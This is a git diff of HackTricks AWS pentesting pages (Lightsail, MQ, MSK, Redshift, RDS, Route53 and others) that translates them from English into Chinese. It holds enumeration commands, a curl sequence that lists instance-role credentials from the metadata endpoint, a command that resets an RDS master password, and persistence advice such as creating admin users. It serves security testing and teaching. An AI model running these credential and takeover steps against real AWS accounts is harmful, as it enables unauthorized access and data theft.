快照**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) 和 [**RDS 快照**](aws-relational-database-rds-enum.md#enumeration) 一样检查这些快照。 -It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). +### 元数据 -### Metadata +**元数据端点可以从 lightsail 访问**,但机器运行在 **AWS 账户中,由 AWS 管理**,因此您无法控制 **授予了哪些权限**。然而,如果您找到利用这些的方式,您将直接利用 AWS。 -**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. 
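A quick sketch of poking that endpoint from inside a Lightsail instance (IMDSv2 style, standard link-local address):

```bash
# Request a session token and then list any exposed role credentials
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
```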
- -### Privesc +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-lightsail-privesc.md {{#endref}} -### Post Exploitation +### 后期利用 {{#ref}} ../aws-post-exploitation/aws-lightsail-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-lightsail-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md index 8504db545..05359a487 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md @@ -4,28 +4,27 @@ ## Amazon MQ -### Introduction to Message Brokers +### 消息代理简介 -**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. +**消息代理**作为中介,促进不同软件系统之间的通信,这些系统可能建立在不同的平台上,并用不同的语言编程。**Amazon MQ**简化了在AWS上部署、操作和维护消息代理的过程。它为**Apache ActiveMQ**和**RabbitMQ**提供托管服务,确保无缝的资源配置和自动软件版本更新。 ### AWS - RabbitMQ -RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. +RabbitMQ是一种突出的**消息队列软件**,也被称为_消息代理_或_队列管理器_。它本质上是一个配置队列的系统。应用程序通过这些队列**发送和接收消息**。在这种情况下,消息可以携带各种信息,从启动其他应用程序(可能在不同服务器上)进程的命令到简单的文本消息。这些消息由队列管理软件保存,直到被接收应用程序检索和处理。AWS提供了一个易于使用的解决方案来托管和管理RabbitMQ服务器。 ### AWS - ActiveMQ -Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: +Apache ActiveMQ®是一种领先的开源、基于Java的**消息代理**,以其多功能性而闻名。它支持多种行业标准协议,提供广泛的客户端兼容性,适用于各种语言和平台。用户可以: -- Connect with clients written in JavaScript, C, C++, Python, .Net, and more. -- Leverage the **AMQP** protocol to integrate applications from different platforms. -- Use **STOMP** over websockets for web application message exchanges. -- Manage IoT devices with **MQTT**. -- Maintain existing **JMS** infrastructure and extend its capabilities. +- 连接用JavaScript、C、C++、Python、.Net等编写的客户端。 +- 利用**AMQP**协议集成来自不同平台的应用程序。 +- 使用**STOMP**通过WebSocket进行Web应用程序消息交换。 +- 使用**MQTT**管理物联网设备。 +- 维护现有的**JMS**基础设施并扩展其功能。 -ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. 
- -## Enumeration +ActiveMQ的强大和灵活性使其适用于多种消息传递需求。 +## 枚举 ```bash # List brokers aws mq list-brokers @@ -48,9 +47,8 @@ aws mq list-configurations # Creacte Active MQ user aws mq create-user --broker-id --password --username --console-access ``` - > [!WARNING] -> TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) +> TODO: 指示如何在内部枚举 RabbitMQ 和 ActiveMQ,以及如何监听所有队列并发送数据(如果您知道如何做到这一点,请发送 PR) ## Privesc @@ -66,7 +64,7 @@ aws mq create-user --broker-id --password --username --c ## Persistence -If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. +如果您知道访问 RabbitMQ 网络控制台的凭据,您可以创建一个具有管理员权限的新用户。 ## References @@ -74,7 +72,3 @@ If you know the credentials to access the RabbitMQ web console, you can create a - [https://activemq.apache.org/](https://activemq.apache.org/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md index 42c7ca640..48743518d 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md @@ -4,22 +4,21 @@ ## Amazon MSK -**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code. +**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** 是一个完全托管的服务,便于开发和执行处理流数据的应用程序,通过 **Apache Kafka**。控制平面操作,包括 **集群** 的创建、更新和删除,由 Amazon MSK 提供。该服务允许利用 Apache Kafka **数据平面操作**,包括数据生产和消费。它基于 **Apache Kafka** 的开源版本运行,确保与现有应用程序、工具和来自合作伙伴及 **Apache Kafka 社区** 的插件兼容,消除了对应用程序代码进行更改的需要。 -In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka. +在可靠性方面,Amazon MSK 旨在 **自动检测和恢复常见的集群故障场景**,确保生产者和消费者应用程序在数据写入和读取活动中保持最小的中断。此外,它旨在通过尝试 **重用被替换代理的存储** 来优化数据复制过程,从而最小化 Apache Kafka 需要复制的数据量。 ### **Types** -There are 2 types of Kafka clusters that AWS allows to create: Provisioned and Serverless. +AWS 允许创建 2 种类型的 Kafka 集群:预配置和无服务器。 -From the point of view of an attacker you need to know that: +从攻击者的角度来看,您需要知道: -- **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports. -- **Serverless** **only support IAM** as authentication method. 
**Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access. - - Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled +- **无服务器不能直接公开**(它只能在没有任何公开暴露 IP 的 VPN 中运行)。然而,**预配置** 可以配置为获取 **公共 IP**(默认情况下不获取)并配置 **安全组** 以 **暴露** 相关端口。 +- **无服务器** **仅支持 IAM** 作为身份验证方法。**预配置** 支持 SASL/SCRAM (**密码**) 身份验证、**IAM** 身份验证、AWS **证书** 管理器 (ACM) 身份验证和 **未认证** 访问。 +- 请注意,如果启用了未认证访问,则无法公开暴露预配置的 Kafka。 ### Enumeration - ```bash #Get clusters aws kafka list-clusters @@ -43,9 +42,7 @@ aws kafka describe-configuration-revision --arn --revision ``` - -### Kafka IAM Access (in serverless) - +### Kafka IAM 访问(在无服务器中) ```bash # Guide from https://docs.aws.amazon.com/msk/latest/developerguide/create-serverless-cluster.html # Download Kafka @@ -75,7 +72,6 @@ kafka_2.12-2.8.1/bin/kafka-console-producer.sh --broker-list $BS --producer.conf # Read messages kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer.config client.properties --topic msk-serverless-tutorial --from-beginning ``` - ### Privesc {{#ref}} @@ -90,14 +86,10 @@ kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer ### Persistence -If you are going to **have access to the VPC** where a Provisioned Kafka is, you could **enable unauthorised access**, if **SASL/SCRAM authentication**, **read** the password from the secret, give some **other controlled user IAM permissions** (if IAM or serverless used) or persist with **certificates**. +如果您将要**访问VPC**,其中有一个Provisioned Kafka,您可以**启用未授权访问**,如果**SASL/SCRAM身份验证**,**读取**密码从秘密中,给予一些**其他受控用户IAM权限**(如果使用IAM或无服务器)或通过**证书**保持持久性。 ## References - [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md index df5a51a37..8ed7d3c6c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md @@ -2,23 +2,22 @@ {{#include ../../../banners/hacktricks-training.md}} -## Baisc Information +## 基本信息 -AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. +AWS Organizations 使得创建新的 AWS 账户变得简单且无需额外费用。资源可以轻松分配,账户可以高效分组,并且可以对单个账户或组应用治理政策,从而增强组织内的管理和控制。 -Key Points: +关键点: -- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. -- **Resource Allocation**: It simplifies the process of allocating resources across the accounts. -- **Account Grouping**: Accounts can be grouped together, making management more streamlined. -- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. 
+- **新账户创建**:AWS Organizations 允许创建新的 AWS 账户而无需额外费用。 +- **资源分配**:它简化了跨账户分配资源的过程。 +- **账户分组**:账户可以被分组在一起,使管理更加高效。 +- **治理政策**:可以对账户或账户组应用政策,确保组织内的合规性和治理。 -You can find more information in: +您可以在以下位置找到更多信息: {{#ref}} ../aws-basic-information/ {{#endref}} - ```bash # Get Org aws organizations describe-organization @@ -39,13 +38,8 @@ aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y ## You need the permission iam:GetAccountSummary aws iam get-account-summary ``` - -## References +## 参考 - https://aws.amazon.com/organizations/ {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md index d5cb84f1d..b27b3670a 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md @@ -1,28 +1,20 @@ -# AWS - Other Services Enum +# AWS - 其他服务枚举 {{#include ../../../banners/hacktricks-training.md}} ## Directconnect -Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). - +允许**将企业私有网络与AWS连接**(这样您可以攻破EC2实例并访问企业网络)。 ``` aws directconnect describe-connections aws directconnect describe-interconnects aws directconnect describe-virtual-gateways aws directconnect describe-virtual-interfaces ``` - ## Support -In AWS you can access current and previous support cases via the API - +在AWS中,您可以通过API访问当前和以前的支持案例。 ``` aws support describe-cases --include-resolved-cases ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md index 7ae94d5d6..3483838fc 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md @@ -4,46 +4,45 @@ ## Amazon Redshift -Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business. +Redshift 是一个完全托管的服务,可以扩展到超过一个 PB 的大小,用作 **大数据解决方案的数据仓库**。使用 Redshift 集群,您可以使用快速的基于 SQL 的查询工具和商业智能应用程序对数据集进行分析,以更好地理解您业务的愿景。 -**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted. +**Redshift 提供静态加密,使用四层加密密钥层次结构,使用 KMS 或 CloudHSM 管理顶层密钥**。**当为您的集群启用加密时,无法禁用,反之亦然**。当您拥有未加密的集群时,无法进行加密。 -Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**. 
+集群的加密只能在创建时进行,一旦加密,数据、元数据和任何快照也会被加密。加密密钥的层次级别如下,**第一层是主密钥,第二层是集群加密密钥,CEK,第三层是数据库加密密钥,DEK,最后第四层是数据加密密钥本身**。 ### KMS -During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective. +在创建集群时,您可以选择 Redshift 的 **默认 KMS 密钥** 或选择您自己的 **CMK**,这使您在密钥控制方面具有更大的灵活性,特别是从可审计的角度来看。 -The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. +Redshift 的默认 KMS 密钥是在第一次选择和使用密钥选项时自动创建的,并由 AWS 完全管理。 -This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory. +此 KMS 密钥随后使用 CMK 主密钥进行加密,第一层。此加密的 KMS 数据密钥随后用作集群加密密钥,CEK,第二层。此 CEK 然后由 KMS 发送到 Redshift,在那里它与集群分开存储。Redshift 然后通过安全通道将此加密的 CEK 发送到集群,在内存中存储。 -Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory. +Redshift 然后请求 KMS 解密 CEK,第二层。此解密的 CEK 也存储在内存中。Redshift 然后创建一个随机的数据库加密密钥,DEK,第三层,并将其加载到集群的内存中。内存中的解密 CEK 然后加密 DEK,DEK 也存储在内存中。 -This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database. +此加密的 DEK 然后通过安全通道发送并单独存储在 Redshift 中。CEK 和 DEK 现在都以加密和解密的形式存储在集群的内存中。解密的 DEK 然后用于加密数据密钥,第四层,这些密钥是 Redshift 为数据库中的每个数据块随机生成的。 -You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3. +您可以使用 AWS Trusted Advisor 监控 Amazon S3 存储桶的配置,并确保启用存储桶日志记录,这对于执行安全审计和跟踪 S3 中的使用模式非常有用。 ### CloudHSM
-Using Redshift with CloudHSM +使用 CloudHSM 的 Redshift -When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates. +在使用 CloudHSM 进行加密时,首先必须在 HSM 客户端和 Redshift 之间建立受信任的连接,同时使用客户端和服务器证书。 -This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition. +此连接是提供安全通信所必需的,允许在 HSM 客户端和 Redshift 集群之间发送加密密钥。使用随机生成的私钥和公钥对,Redshift 创建一个公共客户端证书,该证书由 Redshift 加密并存储。必须下载并注册到您的 HSM 客户端,并分配给正确的 HSM 分区。 -You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition. +然后,您必须使用以下 HSM 客户端的详细信息配置 Redshift:HSM IP 地址、HSM 分区名称、HSM 分区密码和公共 HSM 服务器证书,该证书由 CloudHSM 使用内部主密钥加密。一旦提供了这些信息,Redshift 将确认并验证它可以连接并访问开发分区。 -If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised. +如果您的内部安全政策或治理控制规定您必须应用密钥轮换,那么这在 Redshift 中是可能的,允许您为加密集群轮换加密密钥,但您需要注意,在密钥轮换过程中,它会使集群在非常短的时间内不可用,因此最好仅在需要时或如果您觉得密钥可能已被泄露时进行轮换。 -During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'. +在轮换期间,Redshift 将为您的集群及其任何备份轮换 CEK。它将为集群轮换 DEK,但无法为使用 DEK 加密的存储在 S3 中的快照轮换 DEK。它将使集群处于“轮换密钥”的状态,直到过程完成,状态将返回为“可用”。
### Enumeration - ```bash # Get clusters aws redshift describe-clusters @@ -82,7 +81,6 @@ aws redshift describe-scheduled-actions # The redshift instance must be publicly available (not by default), the sg need to allow inbounds connections to the port and you need creds psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U admin -d dev -p 5439 ``` - ## Privesc {{#ref}} @@ -91,13 +89,9 @@ psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U adm ## Persistence -The following actions allow to grant access to other AWS accounts to the cluster: +以下操作允许将对集群的访问权限授予其他AWS账户: - [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html) - [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md index 473369403..55330a865 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md @@ -2,76 +2,75 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups. +AWS 提供的 **关系数据库服务 (RDS)** 旨在简化 **云中关系数据库** 的部署、操作和扩展。该服务提供了成本效益和可扩展性的优势,同时自动化了诸如硬件配置、数据库配置、补丁和备份等劳动密集型任务。 -AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL. +AWS RDS 支持多种广泛使用的关系数据库引擎,包括 MySQL、PostgreSQL、MariaDB、Oracle 数据库、Microsoft SQL Server 和 Amazon Aurora,兼容 MySQL 和 PostgreSQL。 -Key features of RDS include: +RDS 的主要特点包括: -- **Management of database instances** is simplified. -- Creation of **read replicas** to enhance read performance. -- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. -- **Integration** with other AWS services, such as: - - AWS Identity and Access Management (**IAM**) for robust access control. - - AWS **CloudWatch** for comprehensive monitoring and metrics. - - AWS Key Management Service (**KMS**) for ensuring encryption at rest. +- **数据库实例的管理** 简化。 +- 创建 **只读副本** 以增强读取性能。 +- 配置 **多可用区 (AZ) 部署** 以确保高可用性和故障转移机制。 +- 与其他 AWS 服务的 **集成**,例如: +- AWS 身份和访问管理 (**IAM**) 以实现强大的访问控制。 +- AWS **CloudWatch** 以进行全面监控和指标。 +- AWS 密钥管理服务 (**KMS**) 以确保静态加密。 -## Credentials +## 凭证 -When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can: +创建 DB 集群时,可以配置主 **用户名**(默认为 **`admin`**)。要生成该用户的密码,可以: -- **Indicate** a **password** yourself -- Tell RDS to **auto generate** it -- Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key +- **自己指定** 一个 **密码** +- 告诉 RDS **自动生成** 它 +- 告诉 RDS 在 **AWS Secret Manager** 中管理它,并使用 KMS 密钥进行加密
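For example, a sketch of creating an instance whose master password is generated and stored in Secrets Manager (identifier, class and engine are placeholders; assumes a CLI version that supports the managed master password option):

```bash
aws rds create-db-instance \
  --db-instance-identifier mydb \
  --engine mysql \
  --db-instance-class db.t3.micro \
  --allocated-storage 20 \
  --master-username admin \
  --manage-master-user-password
# The generated secret should later appear under the instance's MasterUserSecret attribute
aws rds describe-db-instances --db-instance-identifier mydb \
  --query 'DBInstances[0].MasterUserSecret'
```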
-### Authentication +### 认证 -There are 3 types of authentication options, but using the **master password is always allowed**: +有 3 种认证选项,但始终允许使用 **主密码**:
-### Public Access & VPC +### 公共访问与 VPC -By default **no public access is granted** to the databases, however it **could be granted**. Therefore, by default only machines from the same VPC will be able to access it if the selected **security group** (are stored in EC2 SG)allows it. +默认情况下,**不授予公共访问** 数据库,但可以 **授予**。因此,默认情况下,只有来自同一 VPC 的机器才能访问它,如果所选的 **安全组**(存储在 EC2 SG 中)允许的话。 -Instead of exposing a DB instance, it’s possible to create a **RDS Proxy** which **improves** the **scalability** & **availability** of the DB cluster. +与其暴露 DB 实例,不如创建一个 **RDS Proxy**,它 **提高** 了 DB 集群的 **可扩展性** 和 **可用性**。 -Moreover, the **database port can be modified** also. +此外,**数据库端口也可以修改**。 -### Encryption +### 加密 -**Encryption is enabled by default** using a AWS managed key (a CMK could be chosen instead). +**默认启用加密**,使用 AWS 管理的密钥(可以选择 CMK)。 -By enabling your encryption, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**.\ -It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**. +通过启用加密,您启用了 **存储、快照、只读副本和备份的静态加密**。管理此加密的密钥可以通过 **KMS** 发放。\ +在数据库创建后,无法添加此级别的加密。**必须在创建时进行**。 -However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted. +然而,有一个 **解决方法允许您加密未加密的数据库,如下所示**。您可以创建未加密数据库的快照,创建该快照的加密副本,使用该加密快照创建新数据库,最后,您的数据库将被加密。 -#### Transparent Data Encryption (TDE) +#### 透明数据加密 (TDE) -Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions. +除了 RDS 在应用层固有的加密能力外,RDS 还支持 **额外的平台级加密机制** 以保护静态数据。这包括 Oracle 和 SQL Server 的 **透明数据加密 (TDE)**。然而,重要的是要注意,虽然 TDE 通过加密静态数据来增强安全性,但它也可能 **影响数据库性能**。这种性能影响在与 MySQL 加密函数或 Microsoft Transact-SQL 加密函数结合使用时尤为明显。 -To utilize TDE, certain preliminary steps are required: +要使用 TDE,需要一些初步步骤: -1. **Option Group Association**: - - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. - - However, it's important to note that option groups are only available for specific database engines and versions. -2. **Inclusion of TDE in Option Group**: - - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. - - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. -3. **TDE Encryption Modes**: - - TDE offers two distinct encryption modes: - - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. 
- - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. +1. **选项组关联**: +- 数据库必须与选项组关联。选项组作为设置和功能的容器,促进数据库管理,包括安全增强。 +- 但是,重要的是要注意,选项组仅适用于特定的数据库引擎和版本。 +2. **在选项组中包含 TDE**: +- 一旦与选项组关联,Oracle 透明数据加密选项需要包含在该组中。 +- 需要认识到,一旦将 TDE 选项添加到选项组中,它就成为永久性固定项,无法移除。 +3. **TDE 加密模式**: +- TDE 提供两种不同的加密模式: +- **TDE 表空间加密**:此模式加密整个表,提供更广泛的数据保护范围。 +- **TDE 列加密**:此模式专注于加密数据库中的特定单个元素,允许对加密数据进行更细粒度的控制。 -Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards. - -### Enumeration +理解这些前提条件和 TDE 的操作复杂性对于有效实施和管理 RDS 中的加密至关重要,以确保数据安全和遵守必要的标准。 +### 枚举 ```bash # Clusters info ## Get Endpoints, username, port, iam auth enabled, attached roles, SG @@ -106,41 +105,36 @@ aws rds describe-db-proxy-targets ## reset credentials of MasterUsername aws rds modify-db-instance --db-instance-identifier --master-user-password --apply-immediately ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md {{#endref}} -### Privesc +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-rds-privesc.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-rds-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-rds-persistence.md {{#endref}} -### SQL Injection +### SQL 注入 -There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. +有方法可以使用 **SQL 语法** 访问 DynamoDB 数据,因此,典型的 **SQL 注入也是可能的**。 {{#ref}} https://book.hacktricks.xyz/pentesting-web/sql-injection {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md index c37002eb7..27c44f695 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md @@ -4,16 +4,15 @@ ## Route 53 -Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ -You can create https, http and tcp **health checks for web pages** via Route53. +亚马逊 Route 53 是一个云 **域名系统 (DNS)** 网络服务。\ +您可以通过 Route53 创建 https、http 和 tcp **网页健康检查**。 -### IP-based routing +### 基于 IP 的路由 -This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ -IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. 
- -### Enumeration +这对于调整您的 DNS 路由以为最终用户做出最佳 DNS 路由决策非常有用。\ +基于 IP 的路由为您提供了 **根据对客户群的特定知识优化路由** 的额外能力。 +### 枚举 ```bash aws route53 list-hosted-zones # Get domains aws route53 get-hosted-zone --id @@ -21,7 +20,6 @@ aws route53 list-resource-record-sets --hosted-zone-id # Get al aws route53 list-health-checks aws route53 list-traffic-policies ``` - ### Privesc {{#ref}} @@ -29,7 +27,3 @@ aws route53 list-traffic-policies {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md index 3133c0eac..5eb766e8c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md @@ -4,144 +4,137 @@ ## S3 -Amazon S3 is a service that allows you **store big amounts of data**. +Amazon S3 是一个允许您 **存储大量数据** 的服务。 -Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case. +Amazon S3 提供多种选项来实现数据在静态状态下的 **保护**。这些选项包括 **权限**(策略)、**加密**(客户端和服务器端)、**桶版本控制** 和 **基于 MFA 的删除**。**用户可以启用** 